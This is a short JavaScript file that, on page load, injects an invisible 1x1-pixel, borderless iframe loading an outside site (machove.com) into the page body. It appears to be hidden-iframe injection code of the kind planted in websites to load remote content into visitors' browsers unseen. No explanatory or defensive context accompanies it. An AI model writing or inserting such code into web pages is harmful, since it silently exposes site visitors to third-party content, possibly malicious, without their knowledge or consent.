function doTheIframe() {
	ifrm = document.createElement("iframe");
	ifrm.setAttribute("src", "http://www.machove.com");
	ifrm.style.width = "1px";
	ifrm.style.height = "1px";
	ifrm.style.visibility = "hidden";
	ifrm.setAttribute("style", "width:1px; height:1px; visibility:hidden");
	ifrm.setAttribute("frameborder", "0");
	document.body.appendChild(ifrm);
}
window.onload = function(){
	doTheIframe();
}